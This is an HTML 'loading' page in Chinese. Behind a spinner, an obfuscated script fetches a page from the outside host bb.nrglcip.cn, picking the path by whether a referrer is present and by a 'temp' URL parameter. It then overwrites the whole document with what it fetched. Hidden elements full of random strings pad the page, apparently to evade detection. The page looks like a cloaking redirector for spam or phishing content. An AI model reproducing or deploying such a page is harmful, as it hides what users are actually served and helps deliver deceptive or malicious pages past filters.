<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .P0102XiU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .P0102XiU .HukH9Yj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .P0102XiU .content {
            line-height: 50px;
            text-align: center
        }

        .P0102XiU .img {
            width: 100%
        }

        .P0102XiU .GQEY1Sn {
            text-align: center
        }

        .P0102XiU .GQEY1Sn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .P0102XiU .GQEY1Sn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .P0102XiU .GQEY1Sn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .P0102XiU .GQEY1Sn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .P0102XiU .GQEY1Sn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .P0102XiU .GQEY1Sn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .P0102XiU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pGXbV992IMwp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Z6aWn7t = pGXbV992IMwp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Z6aWn7t +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Z6aWn7t +".html?a=share";
		}
		
        EEGgWf8a=url+"#"+new Date().getTime();
        EEGgWf8a && function() {
            $.get(EEGgWf8a, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>JRfgB0c9ZH2LjkXfOKmtKs9pnpu</a>
<img  src='' style='display:none'>
<p  style='display:none'>ZJyKr7bZIMYveAk7NrSE8lgEyk3f7pqkyPPcsG</p>
<h1 style='display:none' >FEF8t46gBgm1MEfjFDQDeSWuNmgvz0Vi5GiIlX10uLA5ZB9bQYWwIWlKPO9UGU</h1>
<ul style='display:none' >xqlTmMW7CXNdnCsHsZ2IbV6ewOiDahTUxlAFaIcnKx7Z8MmWopeEyVssmzYua9Xv0w8bGyOCndU1DTq6zsyIqTU</ul>
<img  src='' style='display:none'>
<div style='display:none'>zJGePhnep9YpU2RxQqj5dqJlW7B6vNt6lAwqCHIHy0anwM2KBtCVs9QXpd1TcSu4KsKVBqkkXkM5Isp</div>
<a  href='#' style='display:none'>JRfgB0c9ZH2LjkXfOKmtKs9pnpu</a>
<span style='display:none'>LvciN5clig2k115urLD67Al20o6hAlpAu5jCNM3tJuT1GxIi5iThP8YCVjTxycfiQ8BlkM18WjERbxVhrZrTULLfsfxkyn</span><div class="P0102XiU">
    <div class="HukH9Yj">
        <div class="GQEY1Sn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >VSF5aRDf1Pf0jlb6jzxMBYDSaNYGO2dEINcXAtdW2X20WXcudORS8owyqK2pEKj4ZF3wa6hDYO2CiVaSOKZ</ul>
<b style='display:none' >z9FqoJy6r4zR6vXtBZUGMxedD4tKygOaDKyvKbulFX9cYlPgGn5aMRFqBiLZlc3y3bLC6XfD2ld</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ip4wO1VoEFqqYlnXNLEMjqlENwMuiH86IrtPrFidQDozEKY05jwp8pkEI</a>
<span style='display:none'>kRaoyAKchAdxdGpBxoLnszGY06eJdJyFsXBeGddH2PyISBJi0OVVTfQwPGOV97Z17ddFTjkZX8lCX55KVglnbppQGZv1mrcKuP</span>
<a  href='#' style='display:none'>ip4wO1VoEFqqYlnXNLEMjqlENwMuiH86IrtPrFidQDozEKY05jwp8pkEI</a>
<li style='display:none' >rI9k7GR7HAa3fvnwpPD</li>
<li style='display:none' >rI9k7GR7HAa3fvnwpPD</li></body>
</html>